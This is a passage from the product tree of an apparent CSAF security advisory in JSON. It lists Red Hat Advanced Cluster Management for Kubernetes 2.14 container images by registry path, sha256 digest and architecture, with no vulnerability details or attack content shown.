"product_reference": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
